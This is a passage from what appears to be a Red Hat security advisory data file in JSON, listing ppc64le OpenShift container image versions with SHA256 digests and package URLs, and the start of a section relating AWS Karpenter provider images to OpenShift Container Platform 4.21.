"product_id": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:9848868d7c2cdaecfe67a0acf26fef5ac0497a9767698a185610e52918c9a9d3_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-admission-controller-rhel9@sha256%3A9848868d7c2cdaecfe67a0acf26fef5ac0497a9767698a185610e52918c9a9d3?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847693"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:14210744d7b829c6c23f871ba63f68dd81c9b73766f5661e1d2d32213c4803f1_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:14210744d7b829c6c23f871ba63f68dd81c9b73766f5661e1d2d32213c4803f1_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:14210744d7b829c6c23f871ba63f68dd81c9b73766f5661e1d2d32213c4803f1_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-route-override-cni-rhel9@sha256%3A14210744d7b829c6c23f871ba63f68dd81c9b73766f5661e1d2d32213c4803f1?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846709"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:11960904264550e682164523f55396703b1cbbaa96dd7036e03e6be797d18937_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:11960904264550e682164523f55396703b1cbbaa96dd7036e03e6be797d18937_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:11960904264550e682164523f55396703b1cbbaa96dd7036e03e6be797d18937_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-whereabouts-ipam-cni-rhel9@sha256%3A11960904264550e682164523f55396703b1cbbaa96dd7036e03e6be797d18937?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846291"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:703bf81093cc684e4e3b5f50b95411654437361ffe9b6eb54a7e1ab2e4bd86b6_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:703bf81093cc684e4e3b5f50b95411654437361ffe9b6eb54a7e1ab2e4bd86b6_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:703bf81093cc684e4e3b5f50b95411654437361ffe9b6eb54a7e1ab2e4bd86b6_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-must-gather-rhel9@sha256%3A703bf81093cc684e4e3b5f50b95411654437361ffe9b6eb54a7e1ab2e4bd86b6?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773851203"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:cd11a61958693a33f6c1013c564a2ea8adb25cb0a2791c22ed862db7f14d06cd_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:cd11a61958693a33f6c1013c564a2ea8adb25cb0a2791c22ed862db7f14d06cd_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:cd11a61958693a33f6c1013c564a2ea8adb25cb0a2791c22ed862db7f14d06cd_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-network-interface-bond-cni-rhel9@sha256%3Acd11a61958693a33f6c1013c564a2ea8adb25cb0a2791c22ed862db7f14d06cd?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844493"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:df0b23ef13ea92efbc083c453d2543401dd22cf0a593ee8d594dd29447d95924_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:df0b23ef13ea92efbc083c453d2543401dd22cf0a593ee8d594dd29447d95924_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:df0b23ef13ea92efbc083c453d2543401dd22cf0a593ee8d594dd29447d95924_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-network-metrics-daemon-rhel9@sha256%3Adf0b23ef13ea92efbc083c453d2543401dd22cf0a593ee8d594dd29447d95924?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844925"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:146c6b876b93819d9f783515ad0214f1d0609905d5b0239c1d1c377a8a77f53f_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:146c6b876b93819d9f783515ad0214f1d0609905d5b0239c1d1c377a8a77f53f_ppc64le",
"product_id": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:146c6b876b93819d9f783515ad0214f1d0609905d5b0239c1d1c377a8a77f53f_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/network-tools-rhel9@sha256%3A146c6b876b93819d9f783515ad0214f1d0609905d5b0239c1d1c377a8a77f53f?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773737444"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:b51b328c0c3a959fef4f4c0f19e9181ddc6ea7d1fbaaee32aa08e503b4d3e073_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:b51b328c0c3a959fef4f4c0f19e9181ddc6ea7d1fbaaee32aa08e503b4d3e073_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:b51b328c0c3a959fef4f4c0f19e9181ddc6ea7d1fbaaee32aa08e503b4d3e073_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-oauth-apiserver-rhel9@sha256%3Ab51b328c0c3a959fef4f4c0f19e9181ddc6ea7d1fbaaee32aa08e503b4d3e073?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846012"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:429a55b2ba3ad36682ecd1620103ecdead80af48c9c42148fd72867e53aab0e0_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:429a55b2ba3ad36682ecd1620103ecdead80af48c9c42148fd72867e53aab0e0_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:429a55b2ba3ad36682ecd1620103ecdead80af48c9c42148fd72867e53aab0e0_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-olm-catalogd-rhel9@sha256%3A429a55b2ba3ad36682ecd1620103ecdead80af48c9c42148fd72867e53aab0e0?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773850085"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:6195a65079f6c39b06a7be04d290dd49deaeba212ba499d233744d8cfd2c2de7_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:6195a65079f6c39b06a7be04d290dd49deaeba212ba499d233744d8cfd2c2de7_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:6195a65079f6c39b06a7be04d290dd49deaeba212ba499d233744d8cfd2c2de7_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-olm-operator-controller-rhel9@sha256%3A6195a65079f6c39b06a7be04d290dd49deaeba212ba499d233744d8cfd2c2de7?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846889"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:42ccddde25579f460d4d44bb64d6d6413460678db55538c23c9ba1409cdc5648_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:42ccddde25579f460d4d44bb64d6d6413460678db55538c23c9ba1409cdc5648_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:42ccddde25579f460d4d44bb64d6d6413460678db55538c23c9ba1409cdc5648_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openshift-apiserver-rhel9@sha256%3A42ccddde25579f460d4d44bb64d6d6413460678db55538c23c9ba1409cdc5648?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846844"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:c11fd98702ea065a5addcf840a6144d9df3f7f3bc4901fb3d9873b72f773ccc0_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:c11fd98702ea065a5addcf840a6144d9df3f7f3bc4901fb3d9873b72f773ccc0_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:c11fd98702ea065a5addcf840a6144d9df3f7f3bc4901fb3d9873b72f773ccc0_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openshift-controller-manager-rhel9@sha256%3Ac11fd98702ea065a5addcf840a6144d9df3f7f3bc4901fb3d9873b72f773ccc0?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846693"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:9654c56daa0f42106d3a0ef75b134e4f8fa758894e1941548d122ff94b3677ca_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:9654c56daa0f42106d3a0ef75b134e4f8fa758894e1941548d122ff94b3677ca_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:9654c56daa0f42106d3a0ef75b134e4f8fa758894e1941548d122ff94b3677ca_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openstack-cinder-csi-driver-rhel9@sha256%3A9654c56daa0f42106d3a0ef75b134e4f8fa758894e1941548d122ff94b3677ca?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849462"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:e52888476811447f15ac1a8aa5aa7c6a0610c27cfe996736b136027a475553a5_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:e52888476811447f15ac1a8aa5aa7c6a0610c27cfe996736b136027a475553a5_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:e52888476811447f15ac1a8aa5aa7c6a0610c27cfe996736b136027a475553a5_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openstack-cinder-csi-driver-rhel9-operator@sha256%3Ae52888476811447f15ac1a8aa5aa7c6a0610c27cfe996736b136027a475553a5?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844510"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:568557a3b1c4c0f276e2c118e1ce052880a7f8941459b20a2ab84baf23085fec_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:568557a3b1c4c0f276e2c118e1ce052880a7f8941459b20a2ab84baf23085fec_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:568557a3b1c4c0f276e2c118e1ce052880a7f8941459b20a2ab84baf23085fec_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openstack-cloud-controller-manager-rhel9@sha256%3A568557a3b1c4c0f276e2c118e1ce052880a7f8941459b20a2ab84baf23085fec?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846313"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:8c77bc4638bb1745823c73a98ffb1d660b0d7b87aa93988a547f53bb10febea8_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:8c77bc4638bb1745823c73a98ffb1d660b0d7b87aa93988a547f53bb10febea8_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:8c77bc4638bb1745823c73a98ffb1d660b0d7b87aa93988a547f53bb10febea8_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-framework-tools-rhel9@sha256%3A8c77bc4638bb1745823c73a98ffb1d660b0d7b87aa93988a547f53bb10febea8?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847717"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:dcc0c3762f4c80e5ae273da4e1fff620cc12d064d64489bac41ff83d8c88141c_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:dcc0c3762f4c80e5ae273da4e1fff620cc12d064d64489bac41ff83d8c88141c_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:dcc0c3762f4c80e5ae273da4e1fff620cc12d064d64489bac41ff83d8c88141c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ovn-kubernetes-rhel9@sha256%3Adcc0c3762f4c80e5ae273da4e1fff620cc12d064d64489bac41ff83d8c88141c?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773852900"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:8933b234c6bd8186738f18d257dfc32d35641538925b52afd1a0a13d65e22fc8_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:8933b234c6bd8186738f18d257dfc32d35641538925b52afd1a0a13d65e22fc8_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:8933b234c6bd8186738f18d257dfc32d35641538925b52afd1a0a13d65e22fc8_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-powervs-block-csi-driver-rhel9@sha256%3A8933b234c6bd8186738f18d257dfc32d35641538925b52afd1a0a13d65e22fc8?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773845499"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:1eb19e964813016a8287d03fbf76f10253b9403458297aac393cff083964bc86_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:1eb19e964813016a8287d03fbf76f10253b9403458297aac393cff083964bc86_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:1eb19e964813016a8287d03fbf76f10253b9403458297aac393cff083964bc86_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-powervs-block-csi-driver-rhel9-operator@sha256%3A1eb19e964813016a8287d03fbf76f10253b9403458297aac393cff083964bc86?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773845462"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:4886d171f5973bfd35c0291181485bba6aa524eb8fc16d50a0fe58cf802e35f1_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:4886d171f5973bfd35c0291181485bba6aa524eb8fc16d50a0fe58cf802e35f1_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:4886d171f5973bfd35c0291181485bba6aa524eb8fc16d50a0fe58cf802e35f1_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-powervs-cloud-controller-manager-rhel9@sha256%3A4886d171f5973bfd35c0291181485bba6aa524eb8fc16d50a0fe58cf802e35f1?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846905"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:13755e7b9d537d64ea31a50af4c425415aac6b2e73a6624c291b09cc10ccdc84_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:13755e7b9d537d64ea31a50af4c425415aac6b2e73a6624c291b09cc10ccdc84_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:13755e7b9d537d64ea31a50af4c425415aac6b2e73a6624c291b09cc10ccdc84_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-powervs-machine-controllers-rhel9@sha256%3A13755e7b9d537d64ea31a50af4c425415aac6b2e73a6624c291b09cc10ccdc84?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846615"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:7cd0406733f1313f3ec2011e8bce76ab83b044a75e5025fd8913796f03ad9356_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:7cd0406733f1313f3ec2011e8bce76ab83b044a75e5025fd8913796f03ad9356_ppc64le",
"product_id": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:7cd0406733f1313f3ec2011e8bce76ab83b044a75e5025fd8913796f03ad9356_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/openshift-route-controller-manager-rhel9@sha256%3A7cd0406733f1313f3ec2011e8bce76ab83b044a75e5025fd8913796f03ad9356?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849752"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:1659061e1d03edc348e920093f213b35e95512807ce7dd83b2f1bd0b012d7900_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:1659061e1d03edc348e920093f213b35e95512807ce7dd83b2f1bd0b012d7900_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:1659061e1d03edc348e920093f213b35e95512807ce7dd83b2f1bd0b012d7900_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-service-ca-rhel9-operator@sha256%3A1659061e1d03edc348e920093f213b35e95512807ce7dd83b2f1bd0b012d7900?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849096"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:4b5f35cd93750652837275a4227ee08c40b2b7769ffdeec8a4d7a32ace69bbce_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:4b5f35cd93750652837275a4227ee08c40b2b7769ffdeec8a4d7a32ace69bbce_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:4b5f35cd93750652837275a4227ee08c40b2b7769ffdeec8a4d7a32ace69bbce_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-tools-rhel9@sha256%3A4b5f35cd93750652837275a4227ee08c40b2b7769ffdeec8a4d7a32ace69bbce?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848264"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:978dafa970007d31c2852bfb77988c32682286d57661009997b119887e48bec7_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:978dafa970007d31c2852bfb77988c32682286d57661009997b119887e48bec7_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:978dafa970007d31c2852bfb77988c32682286d57661009997b119887e48bec7_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ovn-kubernetes-microshift-rhel9@sha256%3A978dafa970007d31c2852bfb77988c32682286d57661009997b119887e48bec7?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773850280"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:2851992f2dc7ddfa802ec2902a59e3cb6c19f23b8810e770e82b487748610e64_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:2851992f2dc7ddfa802ec2902a59e3cb6c19f23b8810e770e82b487748610e64_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:2851992f2dc7ddfa802ec2902a59e3cb6c19f23b8810e770e82b487748610e64_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prom-label-proxy-rhel9@sha256%3A2851992f2dc7ddfa802ec2902a59e3cb6c19f23b8810e770e82b487748610e64?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847846"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:5b379b10c95eb7a89203d552ee1c3437ce0afbe61fb0afbdff6f5f421962df5b_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:5b379b10c95eb7a89203d552ee1c3437ce0afbe61fb0afbdff6f5f421962df5b_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:5b379b10c95eb7a89203d552ee1c3437ce0afbe61fb0afbdff6f5f421962df5b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-config-reloader-rhel9@sha256%3A5b379b10c95eb7a89203d552ee1c3437ce0afbe61fb0afbdff6f5f421962df5b?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846285"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:c6abce790ae93c39059b7dbfef6899b2ec75ba1a9864509f6cce28b1d356407e_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:c6abce790ae93c39059b7dbfef6899b2ec75ba1a9864509f6cce28b1d356407e_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:c6abce790ae93c39059b7dbfef6899b2ec75ba1a9864509f6cce28b1d356407e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-rhel9-operator@sha256%3Ac6abce790ae93c39059b7dbfef6899b2ec75ba1a9864509f6cce28b1d356407e?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849686"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:bcf37dd6a57b6d6ecbd834cf812adee2dc841b8bf1d08c21ea29a3c6aab4d405_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:bcf37dd6a57b6d6ecbd834cf812adee2dc841b8bf1d08c21ea29a3c6aab4d405_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:bcf37dd6a57b6d6ecbd834cf812adee2dc841b8bf1d08c21ea29a3c6aab4d405_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-operator-admission-webhook-rhel9@sha256%3Abcf37dd6a57b6d6ecbd834cf812adee2dc841b8bf1d08c21ea29a3c6aab4d405?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773845326"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:9b5c05ee9e7460a2a3fbf2539a4248581d4a69712a2be5601451019c52353cb2_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:9b5c05ee9e7460a2a3fbf2539a4248581d4a69712a2be5601451019c52353cb2_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:9b5c05ee9e7460a2a3fbf2539a4248581d4a69712a2be5601451019c52353cb2_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-telemeter-rhel9@sha256%3A9b5c05ee9e7460a2a3fbf2539a4248581d4a69712a2be5601451019c52353cb2?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846658"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:af2f03bf9b66959ac4e8568bdf8ffe864faa8808bb6790b554b1c3d5d80ea112_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:af2f03bf9b66959ac4e8568bdf8ffe864faa8808bb6790b554b1c3d5d80ea112_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:af2f03bf9b66959ac4e8568bdf8ffe864faa8808bb6790b554b1c3d5d80ea112_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-thanos-rhel9@sha256%3Aaf2f03bf9b66959ac4e8568bdf8ffe864faa8808bb6790b554b1c3d5d80ea112?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844591"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/volume-data-source-validator-rhel9@sha256:549711d0027ee642c77126ff2cc280fef4ac6fa4b28605b9cbda4e34e3fcedfc_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/volume-data-source-validator-rhel9@sha256:549711d0027ee642c77126ff2cc280fef4ac6fa4b28605b9cbda4e34e3fcedfc_ppc64le",
"product_id": "registry.redhat.io/openshift4/volume-data-source-validator-rhel9@sha256:549711d0027ee642c77126ff2cc280fef4ac6fa4b28605b9cbda4e34e3fcedfc_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/volume-data-source-validator-rhel9@sha256%3A549711d0027ee642c77126ff2cc280fef4ac6fa4b28605b9cbda4e34e3fcedfc?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847698"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:0670c2bb289901d477fbc283a5aea07cd38d7a7e19b16a9ac16f681bc94b2c62_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:0670c2bb289901d477fbc283a5aea07cd38d7a7e19b16a9ac16f681bc94b2c62_amd64"
},
"product_reference": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:0670c2bb289901d477fbc283a5aea07cd38d7a7e19b16a9ac16f681bc94b2c62_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:81399846b57621b98c097a30f13e778d9842a8dc443ce62a37dad974b1f7f439_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:81399846b57621b98c097a30f13e778d9842a8dc443ce62a37dad974b1f7f439_s390x"
},
"product_reference": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:81399846b57621b98c097a30f13e778d9842a8dc443ce62a37dad974b1f7f439_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a4de71b4f22f9f5f46300ff38cfda0e4b5647f286fd5bd365d9e0a6cadd94d5d_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a4de71b4f22f9f5f46300ff38cfda0e4b5647f286fd5bd365d9e0a6cadd94d5d_arm64"
},
"product_reference": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a4de71b4f22f9f5f46300ff38cfda0e4b5647f286fd5bd365d9e0a6cadd94d5d_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:ac86e849e17e9a83d6683ed0469538f758a53aec6fbe89df675c66ef66f007e6_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:ac86e849e17e9a83d6683ed0469538f758a53aec6fbe89df675c66ef66f007e6_ppc64le"
},
